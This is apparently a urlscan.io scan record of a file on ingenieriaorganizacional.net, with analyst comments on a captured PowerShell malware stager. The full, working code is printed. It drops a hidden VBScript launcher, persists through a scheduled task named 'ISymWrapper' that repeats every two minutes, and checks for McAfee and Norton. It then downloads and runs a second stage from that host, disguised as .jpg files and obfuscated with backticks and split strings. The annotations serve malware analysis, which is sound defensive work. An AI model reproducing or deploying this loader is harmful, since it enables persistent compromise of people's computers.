ingenieriaorganizacional.net Open in urlscan Pro
50.63.15.171  Public Scan

URL: https://ingenieriaorganizacional.net/.ACTIVATED.txt
Submission Tags: falconsandbox
Submission: On September 07 via api from US — Scanned from DE

Form analysis 0 forms found in the DOM

Text Content

# Analyst annotations (code unchanged): PowerShell stager captured by the scan.
# It defines one function and runs it on the last line. In order, it:
#   1. creates a staging directory under C:\ProgramData,
#   2. writes a VBScript launcher (Reload.vbs) into it,
#   3. registers a scheduled task that re-runs the launcher every 2 minutes,
#   4. checks for two security-product files to choose a second-stage URL,
#   5. downloads the second stage as STOPSERV.ps1 and starts the launcher.
# Host artefacts visible in this listing: C:\ProgramData\Document\Reload.vbs,
# C:\ProgramData\Document\STOPSERV.ps1, scheduled task "ISymWrapper".
Function Visualizations
{

start-sleep -s 2
# Staging directory; every later path in the script points here.
[system.io.directory]::CreateDirectory("C:\ProgramData\Document\")
#-----------------------------------------------------------------------------
# Literal here-string holding the VBScript launcher. It calls WScript.Shell.Run
# with window style 0 (hidden) to start "powershell -ExecutionPolicy Bypass"
# on a path built by concatenating single characters; joined, it reads
# C:\ProgramData\Document\STOPSERV.ps1. The split literal never contains the
# path as one string, presumably to defeat simple string matching.
$Content = @'
set T1 = CreateObject("WScript.Shell")
T1.run "powershell -ExecutionPolicy Bypass & C"+":"+"\"+"P"+"r"+"o"+"g"+"r"+"a"+"m"+"D"+"a"+"t"+"a"+"\"+"D"+"o"+"c"+"u"+"m"+"e"+"n"+"t"+"\"+"S"+"T"+"O"+"P"+"S"+"E"+"R"+"V"+"."+"p"+"s"+"1",0

'@
# Drops the launcher to disk.
[IO.File]::WriteAllText("C:\ProgramData\Document\Reload.vbs", $Content)
#-----------------------------------------------------------------------------

start-sleep -s 3

# Persistence: the task action points directly at Reload.vbs; the trigger fires
# once at registration time and then repeats every 2 minutes.
$action = New-ScheduledTaskAction -Execute 'C:\ProgramData\Document\Reload.vbs'
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 2)
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "ISymWrapper"

start-sleep -s 6

# Path strings padded with "/" characters that .Replace("/","") strips.
# After the strip they read:
#   $NEWS   -> C:\ProgramData\Document\
#   $mcAfee -> C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
#   $nort   -> C:\Program Files\Norton Security\isolate.ini
$NEWS = 'C/:/\P/r/o/g/ra/m/D/at/a\D/oc/um/ent\'.Replace("/","")
$mcAfee = 'C:/\Pro/gram Fil/es\Common /Files\McAfee\/Platf/orm\McUIC/nt.e/xe'.Replace("/","")
$nort = 'C:/\Pr/og/ra/m Fil/es\No/r/to/n S/ecu/rit/y\i/so/l/at/e./i/n/i'.Replace("/","")

# Branch 1: the McAfee file exists -> fetch .M1.jpg.
# In all three branches the type and method names are written with backtick
# escapes; with the backticks dropped they read Net.WebClient and DownloadFile.
# The call sits inside an if() whose body is empty, so the download is the
# side effect of evaluating the condition. The response is saved with a .ps1
# extension although the URL ends in .jpg.
if([System.IO.File]::Exists($mcAfee)){

if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://ingenieriaorganizacional.net/.TEAK/.M1.jpg', $NEWS + 'STOPSERV.ps1')){
}
start-sleep -s 7
# Launches Reload.vbs right away instead of waiting for the scheduled task.
Start "C:\ProgramData\Document\Reload.vbs"
}
# Branch 2: the Norton file exists -> fetch .N1.jpg, the only branch with a
# different URL; presumably a variant of the second stage for that product.
elseif([System.IO.File]::Exists($nort)){

if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://ingenieriaorganizacional.net/.TEAK/.N1.jpg', $NEWS + 'STOPSERV.ps1')){
}
start-sleep -s 7
Start "C:\ProgramData\Document\Reload.vbs"
}
# Branch 3 (neither file found): same URL as branch 1 (.M1.jpg).
else{

if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://ingenieriaorganizacional.net/.TEAK/.M1.jpg', $NEWS + 'STOPSERV.ps1')){
}

start-sleep -s 7
Start "C:\ProgramData\Document\Reload.vbs"
}

}
# Runs the function defined above by passing its name to Invoke-Expression (IEX).
IEX Visualizations